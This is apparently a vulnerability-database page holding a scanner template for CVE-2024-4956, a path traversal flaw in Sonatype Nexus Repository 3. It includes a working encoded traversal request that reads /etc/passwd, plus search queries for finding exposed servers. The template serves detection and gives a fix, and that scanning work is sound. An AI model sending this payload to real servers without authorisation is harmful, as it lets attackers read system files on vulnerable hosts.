CVE-2024-4956: Sonatype Nexus Repository Manager 3 - Local File Inclusion

2025-08-01 Sonatype Nexus Repository Manager 3 PoC Public

Description

Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.

PoC

id: CVE-2024-4956

info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  impact: |
    Unauthenticated attackers can read arbitrary system files via path traversal in Sonatype Nexus Repository.
  remediation: |
    Update Sonatype Nexus Repository 3 to version 3.68.1 or later.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
    - https://support.sonatype.com/hc/en-us/articles/29416509323923
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4956
    cwe-id: CWE-22
    epss-score: 0.18245
    epss-percentile: 0.97065
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sonatype
    product: nexus
    fofa-query:
      - title="Nexus Repository Manager"
      - title="nexus repository manager"
  tags: cve,cve2024,nexus,lfi,sonatype,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100fdf52c9700765085fd8cdd6abbf71cbd6e7fc52ac2704d0626a3cb1e2eb52d3a022070c7eb2949375d6ca139cae1b0be792029ec8f75c59291c2b9dbd84b488e1a1a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities